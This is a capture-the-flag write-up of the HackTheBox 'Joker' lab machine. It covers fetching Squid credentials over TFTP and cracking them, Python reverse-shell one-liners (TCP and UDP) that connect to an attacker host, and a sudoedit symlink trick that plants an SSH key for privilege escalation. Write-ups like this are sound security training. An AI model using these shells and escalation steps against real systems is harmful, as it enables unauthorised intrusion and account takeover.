Joker


HackTheBox

Joker Challenge HackTheBox


Step 1 - Recon

Starting with reconnaissance on host 10.10.10.21, using Nmap we have:

In parallel I fired UDP Proto Scanner and based on all the results there is the Squid proxy on port 3128 and tftp on port 69 open.

Finally, with Nikto nikto -h http://10.10.10.21:3128 we get loads of results and all of them are false positives.

Step 2 - Exploit

In order to access or scan the website we have to proxy our requests through Squid. There are a few ways of connecting/scanning using Squid proxy:

 1. Using the metasploit module squid_pivot_scanning
 2. Using nikto -h IP -useproxy http://10.10.10.21:3128
 3. Using Burp Suite Upstream Proxy

However, in order to use Nikto or Burp we need to find Proxy Squid's credentials first.

So, searching for information about Squid Proxy I found [1] and through TFTP (port 69) I got the squid.conf file using get /etc/squid/squid.conf or just get squid.conf, since we are in the squid directory. Reading and searching online for password storage in Squid Proxy, I saw that there is a file located in /etc/squid/passwords and in there you can store your Squid Proxy password. We have

kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l
Using John the Ripper and the rockyou.txt list to crack the basic auth password we get kalamari and ihateseafood. So now that we have the username and password lets move on to login and scan the host with Nikto. First of all, In burp you have to set up an upstream proxy to connect to the website through the squid proxy.

Now, we can access the host through 127.0.0.1.

You can also run Dirbuster.

Try to access 127.0.0.1 and you will see

Nikto found http://127.0.0.1/console where you can execute python commands:

I tried passing a python reverse shell from Pentestmonkey [2]

 python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("ipaddress",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

but I experienced a lot of crashes and so I tried a reverse shell using udp:

 import subprocess; subprocess.Popen(["python", "-c", 'import os; import pty; import socket; s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM); s.connect((\"ipaddress\", 443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv(\"HISTFILE\",\"/dev/null\"); pty.spawn(\"/bin/sh\"); s.close()'])

Normally, to catch a reverse udp connection I would use nc -nlvup 443, but I used [3] instead, a reverse tty shell. This will allow me to use nano. So, I am logged in as werkzeug and I need to escalate privileges to get to the user flag. If I fire sudo -l I get:

Apparently, you can use sudoedit as alekos without password

 sudoedit -u alekos /var/www/*/*/layout.html

The idea is to create a file in /var/www/testing/x/layout.html, paste our ssh key to the path /home/alekos/.ssh/authorized_keys and then login via ssh as the alekos user.

Steps
 1. Create a folder in /var/www/testing/x and in there create a file named layout.html
 2. We have /var/www/testing/x/layout.html
 3. Create a symbolic link ln -s /var/www/testing/x/layout.html /home/alekos/.ssh/authorized_keys
 4. Edit layout.html using sudoedit -u alekos /var/www/*/*/layout.html and add your ssh key

Now, in order to create our ssh key we need to:

 1. Go to /root/.ssh
 2. Type ssh-keygen via the terminal and hit enter (we do not need a passphrase)
 3. Then cat the id_rsa.pub file and paste it in /var/www/testing/x/layout.html using nano

So, we can login through ssh ssh -i id_rsa alekos@10.10.10.21 and read the user.txt flag.



Step 3 - Privilege Escalation

To get root we need to follow the steps described in [4], 4.3 Tar arbitrary command execution.



References

[1] Where does the Squid Proxy store its cache files?
[2] Reverse Shell Cheat Sheet
[3] bad-hombres - supertty
[4] 4.3 Tar arbitrary command execution